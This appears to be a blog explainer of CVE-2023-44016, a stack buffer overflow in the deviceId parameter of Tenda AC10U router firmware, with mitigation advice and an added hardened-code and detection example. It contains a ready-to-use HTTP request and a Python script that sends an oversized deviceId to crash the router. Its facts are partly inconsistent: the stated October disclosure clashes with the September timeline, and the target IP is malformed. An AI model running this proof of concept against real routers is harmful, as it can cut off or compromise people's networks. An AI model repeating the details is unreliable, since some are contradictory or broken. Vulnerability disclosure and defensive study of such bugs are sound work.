In October 2023, a critical vulnerability was disclosed in the Tenda AC10U wireless router, hardware version v1 (firmware US_AC10UV1.RTL_V15.03.06.49_multi_TDE01). The bug, tracked as CVE-2023-44016, is a stack-based buffer overflow triggered by the deviceId parameter of the addWifiMacFilter function. In plain terms, anyone who can reach the router's web admin panel can crash the device or possibly execute their own code on it.

Let’s break down what this means, see how the exploit works, and take a look at actual code snippets that highlight this serious issue.

What’s the Problem?

A stack overflow happens when a program writes more data into a fixed-size region of stack memory than that region can hold. On the Tenda AC10U, if someone sends an overly long deviceId to the addWifiMacFilter function (part of the router's management pages), the extra bytes spill into neighbouring stack memory, which lets an attacker crash the router or run malicious code.

Where is the Vulnerability?

The bug sits in the addWifiMacFilter function of the router's web server backend. When handling requests, it does not properly check how much data is put into the deviceId parameter. Here’s a simplified look at what happens (in C-like pseudocode):

```c
void addWifiMacFilter(char* deviceId, /* ... other params ... */) {
    char buf[64]; // fixed buffer size

    // Unsafe copy without bounds checking!
    strcpy(buf, deviceId);

    // ... rest of function ...
}
```

If someone sends a deviceId string longer than the buffer can hold (64 bytes including the terminating null), the copy overwrites adjacent stack memory and can potentially change the flow of execution.
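As an added example (not code from the original page or from Tenda's firmware), here is the same handler with the length checked before any copy, alongside a small parser for the form body that doubles as a detection check at a proxy or in log analysis. The function and status names are hypothetical, and the body is parsed without percent-decoding.

```c
#include <stdio.h>
#include <string.h>

#define DEVICE_ID_BUF 64   /* the fixed buffer size named on the page */
enum { FILTER_OK = 0, FILTER_MISSING = 1, FILTER_TOO_LONG = 2 };  /* hypothetical status codes */

/* Length of the deviceId value in an x-www-form-urlencoded body, or -1 when it
 * is absent; if val is non-NULL it receives a pointer to the value.  The key is
 * matched only at pair boundaries and no percent-decoding is done.  Alone, this
 * is a detection rule for a proxy or log job: length >= 64 never fit the buffer. */
long device_id_param(const char *body, const char **val)
{
    const char *p = body;
    while (p && *p) {
        if (strncmp(p, "deviceId=", 9) == 0) {
            const char *v = p + 9, *end = strchr(v, '&');
            if (val) *val = v;
            return end ? (long)(end - v) : (long)strlen(v);
        }
        p = strchr(p, '&');           /* advance to the next key=value pair */
        if (p) p++;
    }
    return -1;
}

/* Hardened replacement for the strcpy on the page: same 64-byte stack buffer,
 * but the length is checked before any write and the copy itself is bounded. */
int add_wifi_mac_filter_hardened(const char *body)
{
    char buf[DEVICE_ID_BUF];
    const char *v;
    long n = device_id_param(body, &v);
    if (n < 0)                       return FILTER_MISSING;
    if ((size_t)n >= sizeof buf)     return FILTER_TOO_LONG;   /* room for the NUL */
    memcpy(buf, v, (size_t)n);
    buf[n] = '\0';
    return FILTER_OK;
}

int main(void)
{
    char big[256] = "deviceId=";      /* constructed oversized body like the page's PoC */
    memset(big + 9, 'A', 200);
    strcpy(big + 209, "&mac=11:22:33:44:55:66&type=");
    printf("benign: %d  oversized: %d\n",
           add_wifi_mac_filter_hardened("deviceId=laptop&mac=11:22:33:44:55:66"),
           add_wifi_mac_filter_hardened(big));
    return 0;
}
```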

Exploit Details

An attacker on your LAN (local network), or anyone on the internet if remote management is enabled, can craft an HTTP POST request to the router's web management interface:

```http
POST /goform/addWifiMacFilter HTTP/1.1
Host: 192.168..1
Cookie: [sessionid_if_needed]
Content-Type: application/x-www-form-urlencoded
Content-Length: [calculated_length]

deviceId=AAAAAAAAAA...A (long string, e.g., 200 "A"s)
&otherParam1=value1
&otherParam2=value2
```

Replace "A...A" with a string far longer than the buffer expects (e.g., 200 or more "A" letters). The router's software never checks the length, so it writes past the allocated buffer.

Here is a quick Python snippet that sends such a payload:

```python
import requests

url = "http://192.168..1/goform/addWifiMacFilter"
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

payload = "deviceId=" + "A"*200 + "&mac=11:22:33:44:55:66&type="
r = requests.post(url, headers=headers, data=payload)
print("Status:", r.status_code)
```

If the router is vulnerable, the request may crash or reboot it, or, when followed by a more sophisticated payload, run attacker-supplied code.

Proof-of-Concept

Community researcher xGloomy and the 360Vulcan Team first reported the bug. They published details on GitHub, for example:

- CVE-2023-44016 disclosure on GitHub
- Official CVE entry

Here's the function logic as seen in a reverse-engineered firmware binary (simplified for clarity):

```c
void __fastcall addWifiMacFilter(http_request *req)
{
    char buf[64];
    // ...
    strcpy(buf, http_request_get_param(req, "deviceId"));
    // Stack overflow if deviceId is longer than 64 bytes!
    // ...
}
```

How Bad Is It?

*Low skill* attackers can use this to crash or reboot your router, cutting off your internet. *Advanced* attackers could craft a payload that takes control of the router and lets them spy on or hijack your network traffic. That makes this a critical remote code execution bug.

How to Fix?

1. Update Now: Check Tenda’s support site for firmware updates. If no patch is available, contact vendor support.
2. Restrict Access: Disable remote management, and make sure the admin page is only available from your LAN.
3. Monitor: If your router behaves strangely (unexpected reboots, slowdowns, unfamiliar connections), consider replacing it.

Original References

- NVD entry for CVE-2023-44016
- qsm888/tenda-router-cve on GitHub
- 360Vulcan Team's scans

Summary

CVE-2023-44016 is a dangerous, easy-to-exploit stack overflow in Tenda AC10U routers. All it takes is an oversized deviceId on the right admin page route. Patch if you can, lock down your admin pages, and stay safe online!

If you have one of these routers, prioritize securing it now. You never want to learn about network hacking the hard way!

Timeline

Published on: 09/27/2023 15:19:35 UTC
Last modified on: 09/27/2023 18:45:36 UTC